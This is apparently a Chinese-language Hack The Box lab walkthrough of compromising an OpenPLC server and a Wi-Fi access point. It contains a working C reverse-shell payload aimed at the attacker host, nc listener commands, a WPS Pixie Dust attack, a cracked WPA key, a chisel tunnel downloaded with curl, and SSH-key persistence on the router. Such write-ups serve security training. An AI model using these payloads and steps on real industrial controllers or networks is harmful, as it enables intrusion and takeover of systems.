目录

连接至HTB服务器并启动靶机

信息搜集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机开放端口进行脚本、服务扫描

使用curl访问靶机8080端口

使用浏览器直接访问/login路径

漏洞利用

使用searchsploit搜索该WebAPP漏洞

Payload

USER_FLAG：bb4486cda052880dad71c535b3fff1af

横向移动

对wlan0接口信息进行扫描

使用oneshot对路由AP进行PIN码PixieDust漏洞利用

通过该WPA配置文件进行连接

AP渗透

攻击机通过chisel开始反向连接

通过FoxyPorxy插件将代理端口设置成1080，将协议切换至SOCKS5

特权提升

使用ssh-keygen生成密钥对

将proxychains4配置文件中的端口设置成1080

ROOT_FLAG：e8ce76b1c0aa7b37bebc8bef041b6a93

---

连接至HTB服务器并启动靶机

靶机IP：10.10.11.7

分配IP：10.10.16.7

---

信息搜集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.11.7 -r 1-65535 --ulimit 5000

使用nmap对靶机开放端口进行脚本、服务扫描

nmap -p 22,8080 -sCV 10.10.11.7

使用curl访问靶机8080端口

curl -I http://10.10.11.7:8080

被重定向了，尝试访问重定向后的URL

curl -I http://10.10.11.7:8080/login

使用浏览器直接访问/login路径

尝试到Google搜索该WebAPP默认凭证

账户：openplc

密码：openplc

使用默认凭证成功登录到网页后台

---

漏洞利用

使用searchsploit搜索该WebAPP漏洞

searchsploit OpenPLC

将该EXP拷贝到当前目录下

searchsploit -m 49803.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 49803.py
  Exploit: OpenPLC 3 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49803
     Path: /usr/share/exploitdb/exploits/python/webapps/49803.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (1794)
Copied to: /home/kali/Desktop/temp/49803.py

尝试利用该EXP

python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425          
[+] Remote Code Execution on OpenPLC_v3 WebServer
[+] Checking if host http://10.10.11.7:8080 is Up...
[+] Host Up! ...
[+] Trying to authenticate with credentials openplc:openplc
[x] Login failed :(

试了很多个Github上的EXP、PoC都不行，我决定手动利用该漏洞

Payload

#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>#define IP "<这里填写攻击机监听IP>"
#define PORT <这里填写攻击机监听端口>int main()
{int sockfd = socket(AF_INET, SOCK_STREAM, 0);struct sockaddr_in server_addr;server_addr.sin_family = AF_INET;server_addr.sin_port = htons(PORT);inet_pton(AF_INET, IP, &(server_addr.sin_addr));connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr));dup2(sockfd, 0);dup2(sockfd, 1);dup2(sockfd, 2);execve("/bin/sh", 0, 0);close(sockfd);return 0;
}

左侧导航栏进入Hardware模块

首先往里写入Payload头部

将initCustomLayer函数内容进行填充

点击Save Change后回到面板

本地侧nc开始监听

nc -lvnp 1425

点击左下角的Start PLC本地侧nc将收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.7] 59548
whoami
root

提升TTY

script -c /bin/bash -q /dev/null

查找user_flag位置并查看其内容

root@attica01:/opt/PLC/OpenPLC_v3/webserver# find / -name 'user.txt'
find / -name 'user.txt'
find: '/sys/kernel/debug': Permission denied
/root/user.txt
root@attica01:/opt/PLC/OpenPLC_v3/webserver# cat /root/user.txt
cat /root/user.txt
bb4486cda052880dad71c535b3fff1af

USER_FLAG：bb4486cda052880dad71c535b3fff1af

---

横向移动

列出所有网络接口

ifconfig

查看wlan0接口是否已链接WIFI

iw wlan0 link

root@attica01:/proc/1# iw wlan0 link
iw wlan0 link
Not connected.

使用wlan0扫描靶机周边WIFI

iwlist wlan0 scan

扫描到WIFI：plcrouter该网络使用WPA2加密方式

对wlan0接口信息进行扫描

iw wlan0 scan

由扫描可见，该接口启用了WPS-1.0，这意味着我们可以突破本机对其他网络的访问限制

使用oneshot对路由AP进行PIN码PixieDust漏洞利用

python3 oneshot.py -i wlan0 -K

新建一个WPA配置

root@attica01:/tmp# cat << EOF > wpa.conf
cat << EOF > wpa.conf
> network={
network={
> ssid="plcrouter"
ssid="plcrouter"
> psk="NoWWEDoKnowWhaTisReal123!"
psk="NoWWEDoKnowWhaTisReal123!"
> }
}
> EOF
EOF

查看该文件内容是否正常写入

cat wpa.conf

root@attica01:/tmp# cat wpa.conf
cat wpa.conf
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
}

通过该WPA配置文件进行连接

wpa_supplicant -B -i wlan0 -c wpa.conf

root@attica01:/tmp# wpa_supplicant -B -i wlan0 -c wpa.conf
wpa_supplicant -B -i wlan0 -c wpa.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information

再次查看wlan0连接状态

iw wlan0 link

root@attica01:/tmp# iw wlan0 link
iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
        SSID: plcrouter
        freq: 2412
        RX: 12741 bytes (181 packets)
        TX: 1139 bytes (11 packets)
        signal: -30 dBm
        rx bitrate: 1.0 MBit/s
        tx bitrate: 54.0 MBit/s

        bss flags:      short-slot-time
        dtim period:    2
        beacon int:     100

查看该网口是否已分配ipv4地址

ifconfig wlan0

root@attica01:/tmp# ifconfig wlan0
ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 7  bytes 1223 (1.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 2172 (2.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

初始化DHCP池

dhclient

再次查看该网口信息发现已分配ipv4地址

ifconfig wlan0

root@attica01:/tmp# ifconfig wlan0
ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.84  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 14  bytes 2444 (2.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19  bytes 3252 (3.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

---

AP渗透

向AP路由发送ICMP包测试连通性

ping -c 3 192.168.1.1

root@attica01:/tmp# ping -c 3 192.168.1.1
ping -c 3 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=0.093 ms

--- 192.168.1.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2046ms
rtt min/avg/max/mdev = 0.066/0.086/0.101/0.015 ms

攻击机通过python开启http服务

python -m http.server 6666

靶机将chisel进行下载

curl -O 10.10.16.8:6666/chisel

攻击机通过chisel开始反向连接

./chisel server -p 8888 --reverse

靶机通过chisel客户端开始代理

./chisel client 10.10.16.8:8888 R:socks

本地chiseel服务端侧收到回显

┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# ./chisel server -p 8888 --reverse
2024/11/23 05:50:59 server: Reverse tunnelling enabled
2024/11/23 05:50:59 server: Fingerprint rk0ke7Ywur1ipavVlzy3deroS9dWpE5/nI1XkuXErk8=
2024/11/23 05:50:59 server: Listening on http://0.0.0.0:8888
2024/11/23 05:56:13 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

通过FoxyPorxy插件将代理端口设置成1080，将协议切换至SOCKS5

尝试直接访问：192.168.1.1

直接空密码进入AP后台控制面板

---

特权提升

在System栏目下找到了Administration控制面板

此处允许我们为AP管理员添加一个SSH公钥文件

使用ssh-keygen生成密钥对

ssh-keygen

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh-keygen                     
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): ./id_rsa
Enter passphrase for "./id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:EiG4sHRbvnftfKikT8F9p9QCsWApbR5AT1ymrNSmhUU root@kali
The key's randomart image is:
+--[ED25519 256]--+
|   .. oo=Eo+     |
|.... o oO*+ o    |
|.o..+ .o+B.o     |
|. .. ...*.. . .  |
|      ooSo.. + o |
|     . o ...o +  |
|      . .oo ..   |
|        +  + .   |
|       ..o. .    |
+----[SHA256]-----+

查看公钥文件内容

cat id_rsa.pub 

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls   
id_rsa  id_rsa.pub
                                                                                                       
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat id_rsa.pub   
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIi+RRJfHVmn5mdCvJwluUwdD1I5zYoo+qE5FpEVKoi root@kali

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIi+RRJfHVmn5mdCvJwluUwdD1I5zYoo+qE5FpEVKoi root@kali

将该公钥上传至该面板中

查看proxychains4配置端口

tail -n 5 /etc/proxychains4.conf

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tail -n 5 /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5  127.0.0.1 1425

将proxychains4配置文件中的端口设置成1080

使用proxychains4代理后通过SSH服务登录到AP路由

proxychains4 ssh root@192.168.1.1 -i id_rsa

在当前目录下找到了root_flag

root@ap:~# id
uid=0(root) gid=0(root)
root@ap:~# ls
root.txt
root@ap:~# cat root.txt
e8ce76b1c0aa7b37bebc8bef041b6a93

ROOT_FLAG：e8ce76b1c0aa7b37bebc8bef041b6a93